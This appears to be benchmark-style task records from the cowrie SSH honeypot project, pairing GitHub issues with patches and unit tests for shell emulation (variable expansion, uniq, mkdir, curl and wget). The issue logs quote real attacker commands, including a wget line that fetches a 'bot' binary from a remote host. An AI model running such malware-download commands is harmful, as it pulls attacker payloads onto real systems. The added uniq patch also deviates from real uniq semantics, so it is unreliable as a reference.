2020-09-17T11:49:15
cowrie/cowrie
1,421
cowrie__cowrie-1421
[ "1419" ]
eab87029819c1ba6084542e8cca599773d621c39
diff --git a/src/cowrie/shell/session.py b/src/cowrie/shell/session.py --- a/src/cowrie/shell/session.py +++ b/src/cowrie/shell/session.py @@ -36,7 +36,7 @@ def __init__(self, avatar, reactor=None): 'USER': self.username, 'HOME': self.avatar.home, 'TMOUT': '1800', - 'UID': self.uid} + 'UID': str(self.uid)} if self.uid == 0: self.environ['PATH'] = '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin' else:
$UID not spitting out UID **Describe the bug**
A hacker found a way to get inside the cowrie box and executed "echo $UID". The reply that came back was empty, and the hacker disconnected. My normal box returned the UID.

**To Reproduce**
Steps to reproduce the behavior:
1. Connect to a Linux machine
2. Type in "echo $UID" (response should be something like 1001 or 0)
3. Connect to cowrie
4. Type in "echo $UID"
5. See nothing replied on screen.

**Expected behavior**
When someone uses the variable $UID, return the value from the honeyfs/etc/passwd file or return 0.

**Server (please complete the following information):**
- OS: Linux nanopineo2 5.8.6-sunxi64 #20.08.2 SMP Fri Sep 4 08:52:31 CEST 2020 aarch64 GNU/Linux
- Python: Python 3.7.3

**Additional context**
My hackers seem to get smarter each day...
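A plausible minimal illustration of the failure (the exact path through cowrie's shell code may differ, but the patch above confirms the root cause: an `int` in the environment dict where every value should be a `str`):

```python
environ = {'UID': 0}          # before the fix: the value is an int
# ' '.join(['echo', environ['UID']])
#   -> TypeError: sequence item 1: expected str instance, int found

environ = {'UID': str(0)}     # after the fix: environment values are strings
print(' '.join(['echo', environ['UID']]))  # echo 0
```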
2020-09-27T17:08:28
cowrie/cowrie
1,423
cowrie__cowrie-1423
[ "1416" ]
87fbfe62fd68f6d1334bcd1f3c89e0e52c5dcc8c
diff --git a/src/cowrie/shell/honeypot.py b/src/cowrie/shell/honeypot.py --- a/src/cowrie/shell/honeypot.py +++ b/src/cowrie/shell/honeypot.py @@ -41,70 +41,19 @@ def lineReceived(self, line): self.lexer = shlex.shlex(instream=line, punctuation_chars=True, posix=True) # Add these special characters that are not in the default lexer self.lexer.wordchars += '@%{}=$:+^,()' + tokens = [] - parc_tokens = [] # stack of parcial command substitution tokens - subshell_tokens = [] # stack of subshell tokens - last_parc_token = False # control the command substitution tokens processing - last_subshell_token = False # control the subshell token processing + while True: try: - if not last_parc_token: - # if we are processing the command substitution dont read token - tok = self.lexer.get_token() - # log.msg("tok: %s" % (repr(tok))) - - if len(subshell_tokens): - if tok: - if tok.endswith(')'): - subshell_tokens.append(tok[:-1]) - last_subshell_token = True - else: - subshell_tokens.append(tok) - - if not tok or last_subshell_token: - cmds = " ".join(subshell_tokens) - self.cmdpending.append((subshell_tokens)) - last_subshell_token = False - subshell_tokens = [] - continue - - if len(parc_tokens): - if tok: - if tok.endswith(')'): - parc_tokens.append(tok[:-1]) - last_parc_token = True - else: - parc_tokens.append(tok) - - if not tok or last_parc_token: - cmds = " ".join(parc_tokens) - # instantiate new shell with redirect output - self.protocol.cmdstack.append(HoneyPotShell(self.protocol, interactive=False, redirect=True)) - # call lineReceived method that indicates that we have some commands to parse - self.protocol.cmdstack[-1].lineReceived(cmds) - # remove the shell - result = self.protocol.cmdstack.pop() - tokens.append(result.protocol.pp.redirected_data.decode()[:-1]) - last_parc_token = False - parc_tokens = [] - - continue + tok = self.lexer.get_token() + # log.msg("tok: %s" % (repr(tok))) if tok == self.lexer.eof: if tokens: self.cmdpending.append((tokens)) - tokens = [] break - """ - Why do we ignore parentheses? 
- We cant have this for shell command substitution to work - # Ignore parentheses - tok_len = len(tok) - tok = tok.strip('(') - tok = tok.strip(')') - if len(tok) != tok_len and tok == '': - continue - """ + # For now, treat && and || same as ;, just execute without checking return code if tok == '&&' or tok == '||': if tokens: @@ -126,24 +75,13 @@ def lineReceived(self, line): break elif tok == '$?': tok = "0" - elif tok[0] == '(': - subshell_tokens.append(tok[1:]) - if tok[-1] == ')': - last_parc_token = True - tok = None + cmd = self.do_command_substitution(tok) + tokens = cmd.split() continue - - elif tok[0] == '$': - envRex = re.compile(r'^\$\(([_a-zA-Z0-9]+)*') - envSearch = envRex.search(tok) - if envSearch is not None: - envMatch = envSearch.group(1) - parc_tokens.append(envMatch) - if tok[-1] == ')': - last_parc_token = True - tok = None - continue + elif '$(' in tok: + tok = self.do_command_substitution(tok) + elif tok.startswith('${'): envRex = re.compile(r'^\$([_a-zA-Z0-9]+)$') envSearch = envRex.search(tok) if envSearch is not None: @@ -152,6 +90,7 @@ def lineReceived(self, line): tok = self.environ[envMatch] else: continue + elif tok.startswith('$'): envRex = re.compile(r'^\${([_a-zA-Z0-9]+)}$') envSearch = envRex.search(tok) if envSearch is not None: @@ -160,6 +99,7 @@ def lineReceived(self, line): tok = self.environ[envMatch] else: continue + tokens.append(tok) except Exception as e: self.protocol.terminal.write( @@ -169,11 +109,71 @@ def lineReceived(self, line): self.cmdpending = [] self.showPrompt() return + if self.cmdpending: self.runCommand() else: self.showPrompt() + def do_command_substitution(self, start_tok): + if start_tok[0] == '(': + # start parsing the (...) expression + dollar_expr = start_tok + pos = 1 + else: + # split the first token to prefix and $(... part + dollar_pos = start_tok.index('$(') + result = start_tok[:dollar_pos] + dollar_expr = start_tok[dollar_pos:] + pos = 2 + opening_count = 1 + closing_count = 0 + + # parse the remaining tokens and execute $(...) parts when found + while opening_count > closing_count: + if dollar_expr[pos:pos + 2] == '$(': + opening_count += 1 + pos += 2 + elif dollar_expr[pos] == ')': + closing_count += 1 + if opening_count == closing_count: + + if dollar_expr[0] == '(': + # return the command in () without executing it + result = dollar_expr[1:pos] + else: + # execute the command in $() and retrieve the output + cmd = dollar_expr[2:pos] + # instantiate new shell with redirect output + self.protocol.cmdstack.append(HoneyPotShell(self.protocol, interactive=False, redirect=True)) + # call lineReceived method that indicates that we have some commands to parse + self.protocol.cmdstack[-1].lineReceived(cmd) + # remove the shell + res = self.protocol.cmdstack.pop() + result += res.protocol.pp.redirected_data.decode()[:-1] + + if pos < len(dollar_expr) - 1: + dollar_expr = dollar_expr[pos + 1:] + if '$(' in dollar_expr: + dollar_pos = dollar_expr.index('$(') + result += dollar_expr[:dollar_pos] + dollar_expr = dollar_expr[dollar_pos:] + opening_count = 1 + closing_count = 0 + pos = 1 + else: + result += dollar_expr + pos += 1 + else: + if opening_count > closing_count and pos == len(dollar_expr) - 1: + tok = self.lexer.get_token() + dollar_expr = dollar_expr + ' ' + tok + elif opening_count == closing_count: + result += dollar_expr[pos] + pos += 1 + + return result + def runCommand(self): pp = None
diff --git a/src/cowrie/test/test_echo.py b/src/cowrie/test/test_echo.py --- a/src/cowrie/test/test_echo.py +++ b/src/cowrie/test/test_echo.py @@ -158,6 +158,27 @@ def test_echo_command_018(self): self.assertEquals(self.tr.value(), b'test\n' + PROMPT) def test_echo_command_019(self): + """ + echo $(echo $(echo test)) + """ + self.proto.lineReceived(b'echo $(echo $(echo test))') + self.assertEquals(self.tr.value(), b'test\n' + PROMPT) + + def test_echo_command_020(self): + """ + echo test_$(echo test)_test + """ + self.proto.lineReceived(b'echo test_$(echo test)_test') + self.assertEquals(self.tr.value(), b'test_test_test\n' + PROMPT) + + def test_echo_command_021(self): + """ + echo test_$(echo test)_test_$(echo test)_test + """ + self.proto.lineReceived(b'echo test_$(echo test)_test_$(echo test)_test') + self.assertEquals(self.tr.value(), b'test_test_test_test_test\n' + PROMPT) + + def test_echo_command_022(self): """ (echo test) """
no $ variable expansion without surrounding whitespace **Describe the bug**
From the logging:
```
2020-09-20T01:19:40.488981Z [HTTPPageDownloader,client] Command found: wget http://[REDACTED]/bot.$(uname -m) -O- > .t
2020-09-20T01:19:40.498587Z [cowrie.commands.wget.HTTPProgressDownloader#info] Starting factory <HTTPProgressDownloader: b'http://[REDACTED]/bot.$(uname'>
```
It looks like $(uname -m) is not being parsed properly before pushing the HTTP request. Doing "echo $(uname -m)" does parse correctly.

**To Reproduce**
Steps to reproduce the behavior:
1. Login as root
2. Wget a file using $(uname -m)
3. See error in request

**Expected behavior**
System variables being expanded before the request is sent (it would download bot.aarch64)

**Server (please complete the following information):**
- OS: Linux nanopineo2 5.8.6-sunxi64 #20.08.2 SMP Fri Sep 4 08:52:31 CEST 2020 aarch64 GNU/Linux
- Python: 3.7.3

**Additional context**
A bot grabber tried to download a file specific to the server, but got 404 errors because the unexpanded $(uname -m) suffix does not name a real file...
The issue here is more around the whitespace around the `$(uname -m)` expansion:
```
root@svr04:~# echo test$(uname)test
test$(uname)test
root@svr04:~#
```
vs
```
root@svr04:~# echo test $(uname) test
test Linux test
```
This is a wider problem as well:
```
root@svr04:~# echo test$TERM
test$TERM
root@svr04:~# echo test $TERM
test xterm-256color
```
I have the same issue and I'm working on a patch. It looks promising; however, I still need some time for testing and fixing. Currently it breaks the `awk` command emulation. See the unit tests.
```
root@cowrie:~# echo test $(uname)
test Linux
root@cowrie:~# echo test$(uname)
testLinux
root@cowrie:~# echo test ${TERM}
test xterm-256color
root@cowrie:~# echo test${TERM}
testxterm-256color
root@cowrie:~# echo test$TERM
testxterm-256color
root@cowrie:~# echo test$(which ls)
test/bin/ls
```
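The core of the eventual fix is locating a balanced `$(...)` span even when it is glued to other characters; a standalone sketch of that scan (simplified from the patch above: the real method also pulls further tokens from the lexer while the parentheses remain open, and this version assumes they are balanced within the token):

```python
def find_dollar_expr(tok):
    # Return the full $(...) span inside a token, allowing nesting.
    start = tok.index('$(')
    depth, pos = 1, start + 2
    while depth:
        if tok[pos:pos + 2] == '$(':
            depth += 1
            pos += 2
        elif tok[pos] == ')':
            depth -= 1
            pos += 1
        else:
            pos += 1
    return tok[start:pos]


print(find_dollar_expr('bot.$(uname -m)'))      # $(uname -m)
print(find_dollar_expr('x$(echo $(uname))y'))   # $(echo $(uname))
```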
2020-10-01T21:27:39
cowrie/cowrie
1,426
cowrie__cowrie-1426
[ "1425" ]
8cadcfcc7f1db6f7959b71f7ea2c4c579d95663b
diff --git a/src/cowrie/insults/insults.py b/src/cowrie/insults/insults.py --- a/src/cowrie/insults/insults.py +++ b/src/cowrie/insults/insults.py @@ -59,15 +59,17 @@ def connectionMade(self): if self.type == 'e': self.stdinlogOpen = True + # log the command into ttylog + if self.ttylogEnabled: + (sess, cmd) = self.protocolArgs + ttylog.ttylog_write(self.ttylogFile, len(cmd), ttylog.TYPE_INTERACT, time.time(), cmd) else: self.stdinlogOpen = False insults.ServerProtocol.connectionMade(self) if self.type == 'e': - cmd = self.terminalProtocol.execcmd.encode('utf8') - if self.ttylogEnabled: - ttylog.ttylog_write(self.ttylogFile, len(cmd), ttylog.TYPE_INTERACT, time.time(), cmd) + self.terminalProtocol.execcmd.encode('utf8') def write(self, data): if self.ttylogEnabled and self.ttylogOpen:
Command output logged before command in ttylog **Describe the bug** When using ssh in 'execcmd' mode, the command output is logged before the command itself. Here a snippet from `src/cowrie/insults/insults.py` with my comments: ``` if self.type == 'e': cmd = self.terminalProtocol.execcmd.encode('utf8') <-- during this call, the output is logged if self.ttylogEnabled: ttylog.ttylog_write(self.ttylogFile, len(cmd), ttylog.TYPE_INTERACT, time.time(), cmd) <-- here the command is logged ``` **To Reproduce** Steps to reproduce the behavior: 1. Connect using ssh client and execute a command: ``` $ ssh root@cowrie "cat /proc/cpuinfo | grep name | wc -l" root@cowrie's password: 2 ``` 2. A snippet from the cowrie log ``` executing command "b'cat /proc/cpuinfo | grep name | wc -l'" CMD: cat /proc/cpuinfo | grep name | wc -l Command found: wc -l Command found: grep name Command found: cat /proc/cpuinfo exitCode: 0 sending request b'exit-status' sending close 0 remote close Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0 seconds ``` 3. Run playlog on the new ttylog: ``` $ bin/playlog -b var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 2 cat /proc/cpuinfo | grep name | wc -l ``` **Expected behavior** The command should be logged first and the output should be logged at the time when it is available.
2020-10-06T15:11:42
cowrie/cowrie
1,428
cowrie__cowrie-1428
[ "1427" ]
8cadcfcc7f1db6f7959b71f7ea2c4c579d95663b
diff --git a/src/cowrie/commands/__init__.py b/src/cowrie/commands/__init__.py --- a/src/cowrie/commands/__init__.py +++ b/src/cowrie/commands/__init__.py @@ -40,6 +40,7 @@ 'tftp', 'ulimit', 'uname', + 'uniq', 'uptime', 'wc', 'wget', diff --git a/src/cowrie/commands/uniq.py b/src/cowrie/commands/uniq.py new file mode 100644 --- /dev/null +++ b/src/cowrie/commands/uniq.py @@ -0,0 +1,52 @@ +# Copyright (c) 2020 Peter Sufliarsky <[email protected]> +# See the COPYRIGHT file for more information + +""" +uniq command +""" + +from __future__ import absolute_import, division + +from twisted.python import log + +from cowrie.shell.command import HoneyPotCommand + + +commands = {} + + +class command_uniq(HoneyPotCommand): + + unique_lines = set() + + def start(self): + if self.input_data: + lines = self.input_data.split(b'\n') + if not lines[-1]: + lines.pop() + + self.unique_lines = set(lines) + for line in self.unique_lines: + self.writeBytes(line + b'\n') + + self.exit() + + def lineReceived(self, line): + log.msg(eventid='cowrie.command.input', + realm='uniq', + input=line, + format='INPUT (%(realm)s): %(input)s') + + self.grep_input(line) + + def handle_CTRL_D(self): + self.exit() + + def grep_input(self, line): + if line not in self.unique_lines: + self.writeBytes(line.encode() + b'\n') + self.unique_lines.add(line) + + +commands['/usr/bin/uniq'] = command_uniq +commands['uniq'] = command_uniq
diff --git a/src/cowrie/test/test_uniq.py b/src/cowrie/test/test_uniq.py new file mode 100644 --- /dev/null +++ b/src/cowrie/test/test_uniq.py @@ -0,0 +1,60 @@ +# -*- test-case-name: Cowrie Test Cases -*- + +# Copyright (c) 2020 Peter Sufliarsky +# See LICENSE for details. + +""" +Tests for uniq command +""" + +from __future__ import absolute_import, division + +import os + +from twisted.trial import unittest + +from cowrie.shell import protocol +from cowrie.test import fake_server, fake_transport + +os.environ["HONEYPOT_DATA_PATH"] = "../data" +os.environ["HONEYPOT_DOWNLOAD_PATH"] = "/tmp" +os.environ["SHELL_FILESYSTEM"] = "../share/cowrie/fs.pickle" + +PROMPT = b"root@unitTest:~# " + + +class ShellUniqCommandTests(unittest.TestCase): + + def setUp(self): + self.proto = protocol.HoneyPotInteractiveProtocol(fake_server.FakeAvatar(fake_server.FakeServer())) + self.tr = fake_transport.FakeTransport("1.1.1.1", "1111") + self.proto.makeConnection(self.tr) + self.tr.clear() + + def test_uniq_command_001(self): + """ + echo test | uniq + """ + self.proto.lineReceived(b'echo test | uniq\n') + self.assertEquals(self.tr.value(), b'test\n' + PROMPT) + + def test_uniq_command_002(self): + """ + echo -e "test\ntest\ntest" | uniq + """ + self.proto.lineReceived(b'echo -e "test\ntest\ntest" | uniq\n') + self.assertEquals(self.tr.value(), b'test\n' + PROMPT) + + def test_uniq_command_003(self): + """ + test without arguments, read stdin and quit after Ctrl+D + """ + self.proto.lineReceived(b'uniq\n') + self.proto.lineReceived(b'test\n') + self.proto.lineReceived(b'test\n') + self.proto.lineReceived(b'test\n') + self.proto.handle_CTRL_D() + self.assertEquals(self.tr.value(), b'test\n\n' + PROMPT) + + def tearDown(self): + self.proto.connectionLost("tearDown From Unit Test")
Adding command 'uniq'

**Is your feature request related to a problem? Please describe.**
From an attack the following command was issued:
```
CMD: grep 'cpu cores' /proc/cpuinfo | uniq
```

**Describe the solution you'd like**
The command "uniq" does not exist yet. From the man pages:
Filter adjacent matching lines from INPUT (or standard input), writing to OUTPUT (or standard output). With no options, matching lines are merged to the first occurrence.

**Describe alternatives you've considered**
Unsure if there is an alternative.

**Additional context**
No additional context
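Note the man-page wording quoted above: real `uniq` only merges *adjacent* matching lines, which a set-based implementation does not preserve. A minimal standalone sketch of the adjacent-only semantics, in plain Python rather than Cowrie's `HoneyPotCommand` framework:

```python
def uniq(lines):
    """Filter adjacent matching lines, like the coreutils tool."""
    out = []
    prev = None
    for line in lines:
        if line != prev:      # only compare against the immediately preceding line
            out.append(line)
        prev = line
    return out


print(uniq(["test", "test", "test"]))  # ['test']
print(uniq(["a", "a", "b", "a"]))      # ['a', 'b', 'a'] -- non-adjacent repeats survive
```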
2020-10-13T19:23:18
cowrie/cowrie
1,434
cowrie__cowrie-1434
[ "1433" ]
819fbd0cc153d9c8bf886f572dd58addd66aa3b0
diff --git a/src/cowrie/commands/fs.py b/src/cowrie/commands/fs.py
--- a/src/cowrie/commands/fs.py
+++ b/src/cowrie/commands/fs.py
@@ -517,6 +517,7 @@ def call(self):
 
 
 commands['/bin/mkdir'] = command_mkdir
+commands['mkdir'] = command_mkdir
 
 
 class command_rmdir(HoneyPotCommand):
Add mkdir as command

**Is your feature request related to a problem? Please describe.**
I see a lot of bots trying to build the .ssh directory or a tmp directory using mkdir. However, when the command is executed they get an error back that the command does not exist.

**Describe the solution you'd like**
Either have it create a virtual location (that only the attacker can see), or have it reply with a txtcommand with the following text:
```
mkdir: missing operand
Try 'mkdir --help' for more information.
```

**Describe alternatives you've considered**
Adding the command to txtcommands, but that does not seem to work properly (missing something?).

**Additional context**
Add any other context or screenshots about the feature request here.
2020-10-22T02:21:33
cowrie/cowrie
1,443
cowrie__cowrie-1443
[ "1412" ]
e1aeb4f55cc081d0014c7a884efde4a626cbb368
diff --git a/src/cowrie/commands/curl.py b/src/cowrie/commands/curl.py
--- a/src/cowrie/commands/curl.py
+++ b/src/cowrie/commands/curl.py
@@ -7,8 +7,6 @@
 import os
 import time
 
-from OpenSSL import SSL
-
 from twisted.internet import reactor, ssl
 from twisted.python import compat, log
 from twisted.web import client
@@ -19,77 +17,7 @@
 
 commands = {}
 
-
-class command_curl(HoneyPotCommand):
-    """
-    curl command
-    """
-    limit_size = CowrieConfig().getint('honeypot', 'download_limit_size', fallback=0)
-    download_path = CowrieConfig().get('honeypot', 'download_path')
-
-    def start(self):
-        try:
-            optlist, args = getopt.getopt(self.args, 'sho:O', ['help', 'manual', 'silent'])
-        except getopt.GetoptError as err:
-            # TODO: should be 'unknown' instead of 'not recognized'
-            self.write("curl: {}\n".format(err))
-            self.write("curl: try 'curl --help' or 'curl --manual' for more information\n")
-            self.exit()
-            return
-
-        for opt in optlist:
-            if opt[0] == '-h' or opt[0] == '--help':
-                self.curl_help()
-                return
-            elif opt[0] == '-s' or opt[0] == '--silent':
-                self.silent = True
-
-        if len(args):
-            if args[0] is not None:
-                url = str(args[0]).strip()
-        else:
-            self.write("curl: try 'curl --help' or 'curl --manual' for more information\n")
-            self.exit()
-            return
-
-        if '://' not in url:
-            url = 'http://' + url
-        urldata = compat.urllib_parse.urlparse(url)
-
-        outfile = None
-        for opt in optlist:
-            if opt[0] == '-o':
-                outfile = opt[1]
-            if opt[0] == '-O':
-                outfile = urldata.path.split('/')[-1]
-        if outfile is None or not len(outfile.strip()) or not urldata.path.count('/'):
-            self.write('curl: Remote file name has no length!\n')
-            self.exit()
-            return
-
-        if outfile:
-            outfile = self.fs.resolve_path(outfile, self.protocol.cwd)
-            path = os.path.dirname(outfile)
-            if not path or \
-                    not self.fs.exists(path) or \
-                    not self.fs.isdir(path):
-                self.write('curl: %s: Cannot open: No such file or directory\n' % outfile)
-                self.exit()
-                return
-
-        url = url.encode('ascii')
-        self.url = url
-
-        self.artifactFile = Artifact(outfile)
-        # HTTPDownloader will close() the file object so need to preserve the name
-
-        self.deferred = self.download(url, outfile, self.artifactFile)
-        if self.deferred:
-            self.deferred.addCallback(self.success, outfile)
-            self.deferred.addErrback(self.error, url)
-
-    def curl_help(self):
-        self.write("""Usage: curl [options...] <url>
+CURL_HELP = """Usage: curl [options...] <url>
 Options: (H) means HTTP/HTTPS only, (F) means FTP only
      --anyauth       Pick "any" authentication method (H)
  -a, --append        Append to target file when uploading (F/SFTP)
@@ -242,8 +170,78 @@
  -V, --version       Show version number and quit
  -w, --write-out FORMAT  What to output after completion
      --xattr         Store metadata in extended file attributes
-    -q               If used as the first parameter disables .curlrc\n""")
-        self.exit()
+    -q               If used as the first parameter disables .curlrc
+    """
+
+
+class command_curl(HoneyPotCommand):
+    """
+    curl command
+    """
+    limit_size = CowrieConfig().getint('honeypot', 'download_limit_size', fallback=0)
+    download_path = CowrieConfig().get('honeypot', 'download_path')
+
+    def start(self):
+        try:
+            optlist, args = getopt.getopt(self.args, 'sho:O', ['help', 'manual', 'silent'])
+        except getopt.GetoptError as err:
+            # TODO: should be 'unknown' instead of 'not recognized'
+            self.write("curl: {}\n".format(err))
+            self.write("curl: try 'curl --help' or 'curl --manual' for more information\n")
+            self.exit()
+            return
+
+        for opt in optlist:
+            if opt[0] == '-h' or opt[0] == '--help':
+                self.write(CURL_HELP)
+                self.exit()
+                return
+            elif opt[0] == '-s' or opt[0] == '--silent':
+                self.silent = True
+
+        if len(args):
+            if args[0] is not None:
+                url = str(args[0]).strip()
+        else:
+            self.write("curl: try 'curl --help' or 'curl --manual' for more information\n")
+            self.exit()
+            return
+
+        if '://' not in url:
+            url = 'http://' + url
+        urldata = compat.urllib_parse.urlparse(url)
+
+        outfile = None
+        for opt in optlist:
+            if opt[0] == '-o':
+                outfile = opt[1]
+            if opt[0] == '-O':
+                outfile = urldata.path.split('/')[-1]
+        if outfile is None or not len(outfile.strip()) or not urldata.path.count('/'):
+            self.write('curl: Remote file name has no length!\n')
+            self.exit()
+            return
+
+        if outfile:
+            outfile = self.fs.resolve_path(outfile, self.protocol.cwd)
+            path = os.path.dirname(outfile)
+            if not path or \
+                    not self.fs.exists(path) or \
+                    not self.fs.isdir(path):
+                self.write('curl: %s: Cannot open: No such file or directory\n' % outfile)
+                self.exit()
+                return
+
+        url = url.encode('ascii')
+        self.url = url
+
+        self.artifactFile = Artifact(outfile)
+        # HTTPDownloader will close() the file object so need to preserve the name
+
+        self.deferred = self.download(url, outfile, self.artifactFile)
+        if self.deferred:
+            self.deferred.addCallback(self.success, outfile)
+            self.deferred.addErrback(self.error, url)
 
     def download(self, url, fakeoutfile, outputfile, *args, **kwargs):
         try:
@@ -265,11 +263,10 @@ def download(self, url, fakeoutfile, outputfile, *args, **kwargs):
             out_addr = (CowrieConfig().get('honeypot', 'out_addr'), 0)
 
         if scheme == 'https':
-            contextFactory = ssl.CertificateOptions(method=SSL.SSLv23_METHOD)
-            reactor.connectSSL(host, port, factory, contextFactory, bindAddress=out_addr)
+            context_factory = ssl.optionsForClientTLS(hostname=host)
+            self.connection = reactor.connectSSL(host, port, factory, context_factory, bindAddress=out_addr)
         else:  # Can only be http
-            self.connection = reactor.connectTCP(
-                host, port, factory, bindAddress=out_addr)
+            self.connection = reactor.connectTCP(host, port, factory, bindAddress=out_addr)
 
         return factory.deferred
 
@@ -320,7 +317,7 @@ class HTTPProgressDownloader(client.HTTPDownloader):
     lastupdate = 0
 
     def __init__(self, curl, fakeoutfile, url, outfile, headers=None):
-        client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent=b'curl/7.38.0')
+        client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent=b'curl/7.38.0', followRedirect=False)
         self.status = None
         self.curl = curl
         self.fakeoutfile = fakeoutfile
diff --git a/src/cowrie/commands/wget.py b/src/cowrie/commands/wget.py
--- a/src/cowrie/commands/wget.py
+++ b/src/cowrie/commands/wget.py
@@ -7,8 +7,6 @@
 import os
 import time
 
-from OpenSSL import SSL
-
 from twisted.internet import reactor, ssl
 from twisted.python import compat, log
 from twisted.web import client
@@ -77,20 +75,20 @@ def start(self):
             self.exit()
             return
 
-        outfile = None
+        self.outfile = None
         self.quiet = False
         for opt in optlist:
             if opt[0] == '-O':
-                outfile = opt[1]
+                self.outfile = opt[1]
             if opt[0] == '-q':
                 self.quiet = True
 
         # for some reason getopt doesn't recognize "-O -"
        # use try..except for the case if passed command is malformed
         try:
-            if not outfile:
+            if not self.outfile:
                 if '-O' in args:
-                    outfile = args[args.index('-O') + 1]
+                    self.outfile = args[args.index('-O') + 1]
         except Exception:
             pass
 
@@ -99,38 +97,32 @@ def start(self):
 
         urldata = compat.urllib_parse.urlparse(url)
 
-        url = url.encode('utf8')
+        self.url = url.encode('utf8')
 
-        if outfile is None:
-            outfile = urldata.path.split('/')[-1]
-            if not len(outfile.strip()) or not urldata.path.count('/'):
-                outfile = 'index.html'
+        if self.outfile is None:
+            self.outfile = urldata.path.split('/')[-1]
+            if not len(self.outfile.strip()) or not urldata.path.count('/'):
+                self.outfile = 'index.html'
 
-        if outfile != '-':
-            outfile = self.fs.resolve_path(outfile, self.protocol.cwd)
-            path = os.path.dirname(outfile)
+        if self.outfile != '-':
+            self.outfile = self.fs.resolve_path(self.outfile, self.protocol.cwd)
+            path = os.path.dirname(self.outfile)
             if not path or not self.fs.exists(path) or not self.fs.isdir(path):
-                self.errorWrite('wget: %s: Cannot open: No such file or directory\n' % outfile)
+                self.errorWrite('wget: %s: Cannot open: No such file or directory\n' % self.outfile)
                 self.exit()
                 return
 
-        self.url = url
-
-        self.artifactFile = Artifact(outfile)
-        # HTTPDownloader will close() the file object so need to preserve the name
-
-        d = self.download(url, outfile, self.artifactFile)
-        if d:
-            d.addCallback(self.success, outfile)
-            d.addErrback(self.error, url)
+        self.deferred = self.download(self.url, self.outfile)
+        if self.deferred:
+            self.deferred.addCallback(self.success)
+            self.deferred.addErrback(self.error, self.url)
         else:
             self.exit()
 
-    def download(self, url, fakeoutfile, outputfile, *args, **kwargs):
+    def download(self, url, fakeoutfile, *args, **kwargs):
         """
         url - URL to download
         fakeoutfile - file in guest's fs that attacker wants content to be downloaded to
-        outputfile - file in host's fs that will hold content of the downloaded file
         """
         try:
             parsed = compat.urllib_parse.urlparse(url)
@@ -145,20 +137,25 @@ def download(self, url, fakeoutfile, *args, **kwargs):
             self.errorWrite('%s: Unsupported scheme.\n' % (url,))
             return None
 
+        # File in host's fs that will hold content of the downloaded file
+        # HTTPDownloader will close() the file object so need to preserve the name
+        self.artifactFile = Artifact(self.outfile)
+
         if not self.quiet:
            self.errorWrite('--%s--  %s\n' % (time.strftime('%Y-%m-%d %H:%M:%S'), url.decode('utf8')))
            self.errorWrite('Connecting to %s:%d... connected.\n' % (host, port))
            self.errorWrite('HTTP request sent, awaiting response... ')
 
-        factory = HTTPProgressDownloader(self, fakeoutfile, url, outputfile, *args, **kwargs)
+        factory = HTTPProgressDownloader(self, fakeoutfile, url, self.artifactFile, *args, **kwargs)
 
         out_addr = None
         if CowrieConfig().has_option('honeypot', 'out_addr'):
             out_addr = (CowrieConfig().get('honeypot', 'out_addr'), 0)
 
         if scheme == b'https':
-            contextFactory = ssl.CertificateOptions(method=SSL.SSLv23_METHOD)
-            self.connection = reactor.connectSSL(host, port, factory, contextFactory, bindAddress=out_addr)
+            context_factory = ssl.optionsForClientTLS(hostname=host)
+            self.connection = reactor.connectSSL(host, port, factory, context_factory, bindAddress=out_addr)
+
         elif scheme == b'http':
             self.connection = reactor.connectTCP(host, port, factory, bindAddress=out_addr)
         else:
@@ -170,7 +167,7 @@ def handle_CTRL_C(self):
         self.errorWrite('^C\n')
         self.connection.transport.loseConnection()
 
-    def success(self, data, outfile):
+    def success(self, data):
         if not os.path.isfile(self.artifactFile.shasumFilename):
             log.msg("there's no file " + self.artifactFile.shasumFilename)
             self.exit()
@@ -189,9 +186,9 @@ def success(self, data):
             shasum=self.artifactFile.shasum)
 
         # Update honeyfs to point to downloaded file or write to screen
-        if outfile != '-':
-            self.fs.update_realfile(self.fs.getfile(outfile), self.artifactFile.shasumFilename)
-            self.fs.chown(outfile, self.protocol.user.uid, self.protocol.user.gid)
+        if self.outfile != '-':
+            self.fs.update_realfile(self.fs.getfile(self.outfile), self.artifactFile.shasumFilename)
+            self.fs.chown(self.outfile, self.protocol.user.uid, self.protocol.user.gid)
         else:
             with open(self.artifactFile.shasumFilename, 'rb') as f:
                 self.writeBytes(f.read())
@@ -199,31 +196,45 @@ def success(self, data):
         self.exit()
 
     def error(self, error, url):
-        if hasattr(error, 'getErrorMessage'):  # exceptions
-            errorMessage = error.getErrorMessage()
-            self.errorWrite(errorMessage + '\n')
-            # Real wget also adds this:
-            if hasattr(error, 'webStatus') and error.webStatus and hasattr(error, 'webMessage'):  # exceptions
-                self.errorWrite('{} ERROR {}: {}\n'.format(time.strftime('%Y-%m-%d %T'), error.webStatus.decode(),
-                                                           error.webMessage.decode('utf8')))
+        # we need to handle 301 redirects separately
+        if hasattr(error, 'webStatus') and error.webStatus.decode() == '301':
+            self.errorWrite('{} {}\n'.format(error.webStatus.decode(), error.webMessage.decode()))
+            https_url = error.getErrorMessage().replace('301 Moved Permanently to ', '')
+            self.errorWrite('Location {} [following]\n'.format(https_url))
+
+            # do the download again with the https URL
+            self.deferred = self.download(https_url.encode('utf8'), self.outfile)
+            if self.deferred:
+                self.deferred.addCallback(self.success)
+                self.deferred.addErrback(self.error, https_url)
+            else:
+                self.exit()
         else:
-            self.errorWrite('{} ERROR 404: Not Found.\n'.format(time.strftime('%Y-%m-%d %T')))
+            if hasattr(error, 'getErrorMessage'):  # exceptions
+                errorMessage = error.getErrorMessage()
+                self.errorWrite(errorMessage + '\n')
+                # Real wget also adds this:
+                if hasattr(error, 'webStatus') and error.webStatus and hasattr(error, 'webMessage'):  # exceptions
+                    self.errorWrite('{} ERROR {}: {}\n'.format(time.strftime('%Y-%m-%d %T'), error.webStatus.decode(),
+                                                               error.webMessage.decode('utf8')))
+            else:
+                self.errorWrite('{} ERROR 404: Not Found.\n'.format(time.strftime('%Y-%m-%d %T')))
 
-        # prevent cowrie from crashing if the terminal have been already destroyed
-        try:
-            self.protocol.logDispatch(eventid='cowrie.session.file_download.failed',
-                                      format='Attempt to download file(s) from URL (%(url)s) failed',
-                                      url=self.url)
-        except Exception:
-            pass
